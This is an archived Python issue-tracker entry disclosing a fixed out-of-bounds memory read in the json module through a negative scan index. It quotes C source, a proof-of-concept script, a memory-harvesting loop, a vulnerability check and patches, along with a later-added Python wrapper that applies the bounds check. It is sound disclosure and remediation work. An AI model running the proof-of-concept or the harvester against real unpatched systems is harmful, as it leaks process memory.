Issue 21529

This issue tracker has been migrated to GitHub, and is currently read-only.
For more information, see the GitHub FAQs in Python's Developer Guide.

classification
Title: JSON module: reading arbitrary process memory
Type: security
Stage:
Components: Extension Modules, Library (Lib)
Versions: Python 3.1, Python 3.2, Python 3.3, Python 3.4, Python 3.5, Python 2.7

process
Status: closed
Resolution: fixed
Dependencies:
Superseder:
Assigned To:
Nosy List: benjamin.peterson, jcea
Priority: critical
Keywords:

Created on 2014-05-19 00:40 by benjamin.peterson, last changed 2022-04-11 14:58 by admin. This issue is now closed.

Messages (3)
msg218771 - Author: Benjamin Peterson (benjamin.peterson) * (Python committer) Date: 2014-05-19 00:40
(Copy paste from the security list)

Python 2 and 3 are susceptible to arbitrary process memory reading by a user or adversary due to a bug in the _json module caused by insufficient bounds checking.

The sole prerequisites of this attack are that the attacker is able to control or influence the two parameters of the scanner's scan_once function: the string to be decoded and the index.

The bug is caused by allowing the user to supply a negative index value. The index value is then used directly as an index to an array in the C code; internally the address of the array and its index are added to each other in order to yield the address of the value that is desired. However, by supplying a negative index value and adding this to the address of the array, the processor's register value wraps around and the calculated value will point to a position in memory which isn't within the bounds of the supplied string, causing the function to access other parts of the process memory.

Let me clarify:

This is Python-3.4.0/Modules/_json.c:

    1035 static PyObject *
    1036 scanner_call(PyObject *self, PyObject *args, PyObject *kwds)
    1037 {
    1038     /* Python callable interface to scan_once_{str,unicode} */
    1039     PyObject *pystr;
    1040     PyObject *rval;
    1041     Py_ssize_t idx;
    1042     Py_ssize_t next_idx = -1;
    1043     static char *kwlist[] = {"string", "idx", NULL};
    1044     PyScannerObject *s;
    1045     assert(PyScanner_Check(self));
    1046     s = (PyScannerObject *)self;
    1047     if (!PyArg_ParseTupleAndKeywords(args, kwds, "On:scan_once", kwlist, &pystr, &idx))
    1048         return NULL;
    1049
    1050     if (PyUnicode_Check(pystr)) {
    1051         rval = scan_once_unicode(s, pystr, idx, &next_idx);
    1052     }
    1053     else {
    1054         PyErr_Format(PyExc_TypeError,
    1055                  "first argument must be a string, not %.80s",
    1056                  Py_TYPE(pystr)->tp_name);
    1057         return NULL;
    1058     }
    1059     PyDict_Clear(s->memo);
    1060     if (rval == NULL)
    1061         return NULL;
    1062     return _build_rval_index_tuple(rval, next_idx);
    1063 }

As you can see on line 1047, ParseTuple takes an 'n' as the format for 'idx', which, as can be learned from this page (https://docs.python.org/3/c-api/arg.html ), means:

    n (int) [Py_ssize_t]
        Convert a Python integer to a C Py_ssize_t.

This means it accepts a SIGNED integer value, thus allowing a negative value to be supplied as the 'idx' parameter.

Then onto scan_once_unicode, to which execution gets transferred through line 1051 of the code above.

    922  static PyObject *
    923  scan_once_unicode(PyScannerObject *s, PyObject *pystr, Py_ssize_t idx, Py_ssize_t *next_idx_ptr)
    924  {
    925      /* Read one JSON term (of any kind) from PyUnicode pystr.
    926      idx is the index of the first character of the term
    927      *next_idx_ptr is a return-by-reference index to the first character after
    928          the number.
    929
    930      Returns a new PyObject representation of the term.
    931      */
    932      PyObject *res;
    933      void *str;
    934      int kind;
    935      Py_ssize_t length;
    936
    937      if (PyUnicode_READY(pystr) == -1)
    938          return NULL;
    939
    940      str = PyUnicode_DATA(pystr);
    941      kind = PyUnicode_KIND(pystr);
    942      length = PyUnicode_GET_LENGTH(pystr);
    943
    944      if (idx >= length) {
    945          raise_stop_iteration(idx);
    946          return NULL;
    947      }

Here we see that 'length' is set to the length of the string parameter. This will never be a negative value. On line 944 it is checked whether idx is equal to or higher than length; this can never be true in the case of a negative index value.

    949      switch (PyUnicode_READ(kind, str, idx)) {

PyUnicode_READ is defined as follows (in Python-3.4.0/Include/unicodeobject.h):

    /* Read a code point from the string's canonical representation.  No checks
       or ready calls are performed. */
    #define PyUnicode_READ(kind, data, index) \
        ((Py_UCS4) \
        ((kind) == PyUnicode_1BYTE_KIND ? \
            ((const Py_UCS1 *)(data))[(index)] : \
            ((kind) == PyUnicode_2BYTE_KIND ? \
                ((const Py_UCS2 *)(data))[(index)] : \
                ((const Py_UCS4 *)(data))[(index)] \
            ) \
        ))

Here we can see that index, which is negative in our example, is used as an array index. Since it is negative, it will internally wrap around and point to an address BELOW the address of 'data'.

So, if a certain negative value (such as -0x7FFFFFFF) is supplied and data[index] effectively points to an invalid or read-protected page in memory, the Python executable will segfault.

But there's more. Instead of making it point to an invalid page, let's make it point to something valid:

    from json import JSONDecoder

    j = JSONDecoder()
    a = "99448866"
    b = "88445522"
    # Distance in memory between the two string objects
    diff = id(a) - id(b)
    print("Difference is " + hex(diff))
    print(j.raw_decode(b))
    # Negative index: the scanner reads outside of 'b'
    print(j.raw_decode(b, diff))

Output of this script is:

    Difference is -0x30
    (88445522, 8)
    (99448866, -40)

The difference between the address of 'a' and the address of 'b' is calculated and supplied as an index to the raw_decode function. Internally the address wraps around and we get to see the contents of 'a' while having supplied 'b' as a parameter.

We can use this harvester to scan memory for valid JSON strings:

    from json import JSONDecoder

    j = JSONDecoder()
    a = "x" * 1000
    for x in range(0, 600000):
        try:
            print(j.raw_decode(a, 0 - x))
        except Exception:
            # No valid JSON at this offset
            pass

There is one drawback, however. We cannot decode strings in this manner because:

    static PyObject *
    scanstring_unicode(PyObject *pystr, Py_ssize_t end, int strict, Py_ssize_t *next_end_ptr)
    {
        /* Read the JSON string from PyUnicode pystr.
        end is the index of the first character after the quote.
        if strict is zero then literal control characters are allowed
        *next_end_ptr is a return-by-reference index of the character
            after the end quote

        Return value is a new PyUnicode
        */
        PyObject *rval = NULL;
        Py_ssize_t len;
        Py_ssize_t begin = end - 1;
        Py_ssize_t next /* = begin */;
        const void *buf;
        int kind;
        PyObject *chunks = NULL;
        PyObject *chunk = NULL;

        if (PyUnicode_READY(pystr) == -1)
            return 0;

        len = PyUnicode_GET_LENGTH(pystr);
        buf = PyUnicode_DATA(pystr);
        kind = PyUnicode_KIND(pystr);

        if (end < 0 || len < end) {
            PyErr_SetString(PyExc_ValueError, "end is out of bounds");
            goto bail;

This code actually performs a bounds check by asserting that end (which is our index) isn't negative.

However, I successfully ran harvesting tests that could extract JSON-encoded arrays of numerical values (such as [10, 20, 40, 70]) from the process memory without any problem or difficulty.

Given the ubiquity of JSON parsing in Python applications and the limited number of prerequisites and conditions under which this bug can be exploited, it is evident that this issue could have serious security implications in some cases.

Here is a patch for 3.4.0:

    --- _json_old.c    2014-04-12 17:47:08.749012372 +0200
    +++ _json.c    2014-04-12 17:44:52.253011645 +0200
    @@ -941,7 +941,7 @@
         kind = PyUnicode_KIND(pystr);
         length = PyUnicode_GET_LENGTH(pystr);
     
    -    if (idx >= length) {
    +    if ( idx < 0 || idx >= length) {
             raise_stop_iteration(idx);
             return NULL;
         }

And here is a patch for 2.7.6:

    --- _json_old.c    2014-04-12 17:57:14.365015601 +0200
    +++ _json.c    2014-04-12 18:04:25.149017898 +0200
    @@ -1491,7 +1491,7 @@
         PyObject *res;
         char *str = PyString_AS_STRING(pystr);
         Py_ssize_t length = PyString_GET_SIZE(pystr);
    -    if (idx >= length) {
    +    if ( idx < 0 || idx >= length) {
             PyErr_SetNone(PyExc_StopIteration);
             return NULL;
         }
    @@ -1578,7 +1578,7 @@
         PyObject *res;
         Py_UNICODE *str = PyUnicode_AS_UNICODE(pystr);
         Py_ssize_t length = PyUnicode_GET_SIZE(pystr);
    -    if (idx >= length) {
    +    if ( idx < 0 || idx >= length) {
             PyErr_SetNone(PyExc_StopIteration);
             return NULL;
         }

Here is a script that checks whether the Python binary that executes it is vulnerable:

    from json import JSONDecoder

    j = JSONDecoder()

    a = '128931233'
    b = "472389423"

    # x is the object at the lower address, y the one at the higher address
    if id(a) < id(b):
        x = a
        y = b
    else:
        x = b
        y = a

    diff = id(x) - id(y)  # always negative

    try:
        j.raw_decode(y, diff)
        print("Vulnerable")
    except Exception:
        print("Not vulnerable")

Please let me know what your thoughts on this are and when you think it will be fixed. Thank you.

Note: I haven't shared this vulnerability with anyone and I won't do so until the bug has been fixed.

Guido Vranken
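
For code that has to run on an interpreter without this fix, one possible stopgap is to apply the same bounds check in Python before the index ever reaches the C scanner. The following is only a minimal sketch and is not part of the original report or of the committed patches: safe_raw_decode is a hypothetical helper name, and rejecting every out-of-range index with ValueError is an assumed policy.

```python
from json import JSONDecoder


def safe_raw_decode(decoder, s, idx=0):
    """Call decoder.raw_decode(s, idx) only after checking idx in Python.

    Hypothetical helper: it mirrors the `idx < 0 || idx >= length` test
    from the proposed patch, so an out-of-range index never reaches the
    C scanner.
    """
    if idx < 0 or idx >= len(s):
        raise ValueError(
            "idx %d is out of range for a string of length %d" % (idx, len(s))
        )
    return decoder.raw_decode(s, idx)


decoder = JSONDecoder()

# A valid index behaves exactly like a plain raw_decode call.
print(safe_raw_decode(decoder, "88445522"))

# The negative offset used in the report is refused up front.
try:
    safe_raw_decode(decoder, "88445522", -0x30)
except ValueError as exc:
    print("rejected: %s" % exc)
```

The wrapper only guards call sites that go through it; any direct call to raw_decode or scan_once with attacker-influenced indices would still need the interpreter-level fix.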
msg218772 - Author: Benjamin Peterson (benjamin.peterson) * (Python committer) Date: 2014-05-19 00:42
http://hg.python.org/cpython/rev/50c07ed1743d
http://hg.python.org/cpython/rev/a8facac493ef
msg218807 - Author: Jesús Cea Avión (jcea) * (Python committer) Date: 2014-05-19 18:54
Fixed also in 3.2 (b9913eb96643), 3.3 (4f15bd1ab28f), 3.4 (7b95540ced5c) and 3.5 (3a414c709f1f).
History
Date                 User               Action  Args
2022-04-11 14:58:03  admin              set     github: 65728
2014-05-19 18:54:21  jcea               set     messages: +msg218807
2014-05-19 18:46:14  jcea               set     nosy: +jcea
2014-05-19 00:42:12  benjamin.peterson  set     status: open -> closed; resolution: fixed; messages: +msg218772
2014-05-19 00:40:59  benjamin.peterson  create
